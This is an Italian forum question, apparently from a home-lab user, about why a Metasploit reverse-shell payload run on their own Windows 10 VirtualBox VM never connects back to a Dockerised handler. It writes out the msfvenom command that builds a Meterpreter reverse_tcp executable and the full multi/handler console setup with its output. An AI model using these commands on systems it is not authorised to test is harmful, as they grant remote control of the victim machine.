Sto eseguendo metasploit sulla finestra mobile da: remnux / metasploit e voglio aprire una shell inversa su una macchina virtuale che esegue Windows 10 in una casella virtuale. Il contenitore docker e il vm vengono eseguiti sulla stessa macchina host con ip: 192.168.10.1
Vado:
sudo docker run --rm -it -p 8080:8080 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
Quindi:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86
LHOST=192.168.10.1 LPORT=8080 -f exe -o file.exe
E attiva msfconsole:
msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > exploit
[-] Handler failed to bind to 192.168.10.1:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Starting the payload handler...
Finalmente apro file.exe sulla macchina Windows10 e non succede nulla. Ho controllato che la porta 8080 era aperta sul computer host e che il vm poteva eseguire il ping sulla macchina host a 192.168.10.1
La configurazione della mia virtualbox network è impostata su bridged adapter.
Inoltre non ho antivirus in esecuzione su questo vm e Windows Defender è inattivo.
Qualcuno ha qualche idea sul perché questo non funziona? Grazie in anticipo.